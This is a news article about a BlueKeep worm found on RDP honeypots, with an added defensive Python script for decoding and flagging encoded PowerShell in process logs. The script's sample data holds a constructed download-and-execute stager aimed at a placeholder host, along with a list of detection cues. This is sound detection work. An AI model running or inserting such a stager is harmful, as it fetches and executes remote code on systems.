iTnews

Researchers spot BlueKeep worm hitting honeypots

By Juha Saarinen on Nov 4, 2019 7:08AM

Yet to hit Australia.

Security researchers are seeing the first indications of self-replicating malware or worms exploiting unpatched Windows systems vulnerable to the BlueKeep remote desktop protocol flaw.

Over the weekend, well-known OpenSecurity.global researcher Kevin Beaumont tweeted that his EternalPot RDP honeypots had started crashing with the Windows Blue Screen of Death (BSoD) in every region they were deployed in, bar Australia.

Honeypots are systems specifically set up by security researchers to catch exploit attempts.

Marcus Hutchins, a researcher who rose to instant fame after mitigating the destructive WannaCry ransomware attack and who was afterwards arrested by United States authorities for alleged malware dissemination, chipped in with a preliminary analysis of the crashes.

Hutchins suspected they're due to a BlueKeep worm making the rounds.

It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner. https://t.co/7G88YAW5lr

— MalwareTech (@MalwareTechBlog) November 2, 2019

Further analysis by Hutchins confirmed that this is a BlueKeep exploit, arriving some six months after the vulnerability was published.

The malicious code delivered by the worm downloads and executes a series of encoded Windows PowerShell commands.

These fetch another payload, an executable that runs a miner for the Monero crypto-currency.
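The article describes a two-stage chain: shellcode that runs encoded PowerShell commands, which in turn fetch and run a miner. On the defender's side, the base64-encoded command line is the most visible artefact, because it lands in process-creation logs on any host that records command lines. The following Python triage script is an added example, not code from the article or from the researchers named in it. It decodes the `-EncodedCommand` argument (PowerShell accepts any prefix of that flag name, down to `-e`) and flags decoded content that contains download-and-execute cues. The log lines are constructed for the example; the host names, paths and the `example.invalid` URL are placeholders.

```python
import base64
import binascii
import re

# Substrings that, once a command is decoded, indicate a download-and-execute
# stage rather than ordinary administration. Heuristic, not exhaustive.
DOWNLOAD_CUES = (
    "downloadstring", "downloadfile", "net.webclient",
    "invoke-webrequest", "invoke-expression", "iex",
    "start-process",
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, -encoded, ...). Build the alternation longest-first so the regex
# engine takes the full spelling when it is present.
_ENC_FORMS = ["ec"] + ["encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)]
ENC_FLAG = re.compile(
    r"[-/](?:" + "|".join(sorted(_ENC_FORMS, key=len, reverse=True)) + r")\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def encode_ps(command: str) -> str:
    """Return the base64(UTF-16LE) form that -EncodedCommand expects.

    Used here only to build the constructed sample log lines."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Extract and decode an encoded PowerShell argument, or return None."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1))
        if len(raw) % 2:  # UTF-16LE needs an even byte count
            return None
        return raw.decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_powershell(decoded: str) -> list:
    """Return the download/execute cues present in a decoded command."""
    text = decoded.lower()
    return [cue for cue in DOWNLOAD_CUES if cue in text]


def triage(log_lines):
    """Return one finding per log line whose encoded command carries cues."""
    findings = []
    for line in log_lines:
        decoded = decode_encoded_command(line)
        if decoded is None:
            continue
        cues = score_powershell(decoded)
        if cues:
            findings.append({"line": line, "decoded": decoded, "cues": cues})
    return findings


# Constructed process-creation log lines (placeholders, not real telemetry).
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOGS = [
    # Stager pattern: hidden window, encoded download-and-run of a second stage.
    f"4688 host=WS01 user=SYSTEM cmd={PS_EXE} -NoP -W Hidden -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"),
    # Benign encoded command: an administrator's service query.
    f"4688 host=WS02 user=admin cmd={PS_EXE} -EncodedCommand "
    + encode_ps("Get-Service | Where-Object Status -eq 'Running'"),
    # No encoded argument at all.
    f"4688 host=WS03 user=admin cmd={PS_EXE} -Command Get-Date",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOGS):
        print(finding["line"][:60], "...")
        print("  decoded:", finding["decoded"])
        print("  cues:   ", ", ".join(finding["cues"]))
```

Run on real telemetry, the same loop would iterate over exported Windows Security 4688 events or Sysmon process-creation events, with command-line auditing enabled on the host. The cue list deliberately includes the benign-looking `iex` and `start-process` tokens because the second stage in the chain above needs some way to execute what it fetched; tune it against your own baseline before alerting on it.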

Beaumont later said that "we found definite BlueKeep exploitation in the wild across every country with an RDP honeypot (except Australia)."

He added in a blog post that there are over 724,000 internet-accessible systems that are not patched against the BlueKeep vulnerability.

Administrators should also patch internal systems against BlueKeep, as history has shown that worms can spread to these as well.

Microsoft has warned that the BlueKeep vulnerability is extremely serious, and could lead to another WannaCry malware epidemic, or worse.

Patches have been issued for vulnerable Windows systems, including Windows XP and Windows Server 2003, both of which are long out of support.

The Australian Cyber Security Centre has urged administrators to apply the available patches as soon as possible.

Copyright © iTnews.com.au. All rights reserved.